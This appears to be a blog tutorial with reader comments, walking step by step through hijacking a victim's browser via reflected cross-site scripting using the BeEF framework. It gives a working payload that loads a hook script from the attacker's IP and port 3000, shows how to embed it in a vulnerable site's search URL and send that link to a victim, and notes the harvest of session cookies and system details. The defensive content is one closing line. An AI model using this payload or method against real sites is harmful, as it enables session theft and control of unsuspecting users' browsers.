• 26,769
  • +1,026
  • 3,010
XSS Attack: Hacking Using BeeF XSS Framework

XSS Attack: Hacking Using BeeF XSS Framework

Bookmark

Still in the XSS Attack series, now we will continue from the last tutorial about finding simple XSS vulnerability to Hacking Using BeeF XSS Framework.

We already know how to find the simple cross site scripting vulnerability in a website, in this tutorial actually just the basic how you can understand the flow of XSS attack. If you still don't understand about what is XSS and the scenario in this tutorial, you can go and look the previous tutorial about finding simple XSS vulnerability.

Today tutorial will be more focus on enumeration, but if you explore by yourselves you will get more than just data enumeration :-).

I hope you can learn by yourselves after read this tutorial. It happen the same in real life, do not expect to mastering this if you just learn about everything inside the school behind the table, you need to dig yourselves, try, try and try and put your comfort zone far away from you. Let start the tutorial ๐Ÿ™‚

Step by step Hacking Using Beef XSS Framework

1. Before we start, here is the details information I use in this tutorial.

Attacker:

OS: Backtrack 5

IP: 192.168.160.236

Already have XSS vulnerable website as a mediator

Victim:

OS: Windows 7 Ultimate

IP: 192.168.160.104

2. We will start the BeeF XSS framework first:

XSS Attack: Hacking Using BeeF XSS Framework

if you get an error, maybe you haven't installed the beef xss framework.

3. After you run beef in the step two, a window will popped out and tell you the username and password to log in to beef admin panel. By default the username: beef and password: beef. The beef control panel should be:

http://your_ip_or_hostname:3000/ui/panel

XSS Attack: Hacking Using BeeF XSS Framework

4. This is the default display when you successfully log in to the beef xss framework control panel

XSS Attack: Hacking Using BeeF XSS Framework

5. Now let's see the information command window, inside there you can see some information how to operate the beef framework, especially how to spread the malicious javascript.

XSS Attack: Hacking Using BeeF XSS Framework

From the picture above, we must inject the hook URL address to the XSS vulnerable website.

6. Because I already have the XSS vulnerable website from the last tutorial about finding simple xss vulnerability so I just use one of it. The next step I also already prepare the code to inject in the search box

<script type=text/javascript src=http://192.168.160.236:3000/hook.js></script>

so it will look like this:

XSS Attack: Hacking Using BeeF XSS Framework

The next step attacker will copy the URL together with malicious script inside it and send it to victim. This is the URL looks like:

http://www.xss_vulnerable_website/search.asp?keyword=<script type=text/javascript src=http://192.168.160.236:3000/hook.js></script>&x=0&y=0

7. When victim click the link sent by attacker, the attacker command line window will show an activity.

XSS Attack: Hacking Using BeeF XSS Framework

the picture above means that victim with IP 192.168.160.104 already click the malicious link with mediator xxx.com.

8. When we move to the Beef xss framework control panel, the control panel record some activity there.

XSS Attack: Hacking Using BeeF XSS Framework

9. Many information also available there including session cookie, system information, etc.

XSS Attack: Hacking Using BeeF XSS Framework

hope you found it useful ๐Ÿ™‚

Conclusion:

1. XSS can directly attack the user that visit a website.

2. Do not click a link that you don't know.

We will still continue the XSS attack series tutorial in the next post, keep updated. If you find this post useful, spread it! ๐Ÿ™‚

Subscribe Now To Get The Latest Hacking Tutorial Update on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • IND0n351a

    wooww good tutorial
    thx uncle hehhe ๐Ÿ™‚
    you know
    I studied this tutorial to 3 days
    but until now I have not understood all of this article
    and I will continue tomorrow again
    because this morning I had to go to school
    bye….
    see u next time (www.hack-tutorial.com)

  • Anonym

    This only works in lan? i tested, in lan it works perfectly but in global network it doesn’t gives any result (sorry for my english)

    • v4L

      #Anonym

      the above example I test it on the internet with victim from local network. You can see other tutorial here http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • Ramesh

    A total crap.
    Just following the steps,not explaining them.
    Grow up admin and write some good articles

  • mark benedict castro

    How to make a root in android xmod

  • mrrobot

    anyone , can help me to cme out from this problem